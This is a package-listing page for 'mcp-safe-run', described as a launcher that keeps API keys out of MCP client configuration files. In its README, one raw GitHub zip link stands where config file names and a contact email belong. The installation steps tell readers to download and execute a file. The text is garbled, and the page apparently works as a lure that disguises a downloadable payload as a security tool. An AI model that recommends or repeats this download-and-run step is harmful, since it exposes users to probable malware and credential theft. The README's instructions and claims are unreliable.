freshcrate
Skin:/
Home > MCP Servers > mcp-safe-run

mcp-safe-run

Tired of hardcoding secrets like API keys in your MCP client configuration (e.g., mcp.json, claude_desktop_config.json)? mcp-secure-launcher lets you run your existing MCP servers securely without mod

Why this rank:Strong adoptionHealthy release cadence

Description

Tired of hardcoding secrets like API keys in your MCP client configuration (e.g., mcp.json, claude_desktop_config.json)? mcp-secure-launcher lets you run your existing MCP servers securely without modifying them.

README

MCP Safe Run ๐Ÿš€

MCP Safe Run Releases

Welcome to the MCP Safe Run repository! If youโ€™re tired of hardcoding secrets like API keys in your MCP client configuration files (like https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip or https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip), youโ€™re in the right place. The mcp-secure-launcher allows you to run your existing MCP servers securely without modifying them.

Table of Contents

  1. Features
  2. Installation
  3. Usage
  4. Configuration
  5. Contributing
  6. License
  7. Support
  8. Contact

Features ๐ŸŒŸ

  • Secure Management of Secrets: Store your API keys and other sensitive information securely.
  • No Modifications Required: Run your existing MCP servers without changing your configuration files.
  • Easy Integration: Simple setup process that integrates seamlessly with your current workflow.
  • Cross-Platform Compatibility: Works on Windows, macOS, and Linux.

Installation โš™๏ธ

To get started, download the latest release from our Releases page. Once downloaded, execute the file to install the mcp-secure-launcher.

Prerequisites

Before you begin, ensure you have the following installed:

Step-by-Step Guide

  1. Download the Release: Visit the Releases page and download the latest version.
  2. Execute the Installer: Run the downloaded file to install the launcher.
  3. Verify Installation: Open your terminal and type mcp-secure-launcher --version to confirm the installation.

Usage ๐Ÿ“ฆ

Using mcp-secure-launcher is straightforward. Follow these steps to start running your MCP servers securely.

Starting the Launcher

Open your terminal and type the following command:

mcp-secure-launcher start

This command will initiate the launcher and load your MCP server configuration.

Adding Secrets

To add secrets, use the following command:

mcp-secure-launcher add-secret <key> <value>

Replace <key> with the name of your secret and <value> with the actual secret.

Running Your MCP Server

Once your secrets are added, run your MCP server with:

mcp-secure-launcher run <server_name>

Replace <server_name> with the name of your server configuration.

Configuration โš™๏ธ

Configuration Files

The launcher reads from a configuration file named https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip. Hereโ€™s a sample structure:

{
  "servers": [
    {
      "name": "MyServer",
      "port": 8080,
      "secrets": {
        "API_KEY": "your_api_key_here"
      }
    }
  ]
}

Environment Variables

You can also configure secrets using environment variables. Set the variables in your terminal before starting the launcher:

export API_KEY="your_api_key_here"

Contributing ๐Ÿค

We welcome contributions to MCP Safe Run! If youโ€™d like to help, please follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push to your branch.
  5. Create a pull request.

Code of Conduct

Please read our Code of Conduct before contributing.

License ๐Ÿ“„

This project is licensed under the MIT License. See the LICENSE file for details.

Support ๐Ÿ› ๏ธ

If you encounter any issues, please check the Issues section for existing solutions. If your issue isnโ€™t listed, feel free to create a new issue.

Contact ๐Ÿ“ฌ

For questions or feedback, please reach out to us via GitHub or email us at https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip


Thank you for checking out MCP Safe Run! We hope it makes managing your MCP servers easier and more secure. Donโ€™t forget to visit our Releases page for the latest updates and downloads.

Release History

VersionChangesUrgencyDate
2.4.6This release of mcp-safe-run, version 2.4.6, enhances security for your MCP client configurations. With this update, you can now manage your API keys and other sensitive information more effectively, eliminating the need for hardcoding. Enjoy a smoother, safer experience while running your existing MCP servers.Low4/27/2025

Dependencies & License Audit

Loading dependencies...

Similar Packages

EVOKORE-MCPAggregate and serve specialized Agent Skills across multiple servers with dynamic tool management and human-in-the-loop security controls.main@2026-06-02
spaceship-mcp๐Ÿš€ Manage domains, DNS, contacts, and listings with spaceship-mcp, a community-built MCP server for the Spaceship API.main@2026-06-02
better-notion-mcpMarkdown-first MCP server for Notion API - composite tools optimized for AI agentsv2.34.4
affine-mcp-serverModel Context Protocol server for AFFiNE. Connect AI assistants to AFFiNE workspaces, documents, databases, and collaboration APIs over stdio or HTTP.v2.1.0
MeiGen-AI-Design-MCPMeiGen-AI-Design-MCP โ€” Turn Claude Code / OpenClaw into your local Lovart. Local ComfyUI, 1,400+ prompt library, multi-direction parallel generation.v1.3.2

More in MCP Servers

AstrBotAgentic IM Chatbot infrastructure that integrates lots of IM platforms, LLMs, plugins and AI feature, and can be your openclaw alternative. โœจ
agentscopeBuild and run agents you can see, understand and trust.
claude-plugins-officialOfficial, Anthropic-managed directory of high quality Claude Code Plugins.
langchain4jLangChain4j is an open-source Java library that simplifies the integration of LLMs into Java applications through a unified API, providing access to popular LLMs and vector databases. It makes impleme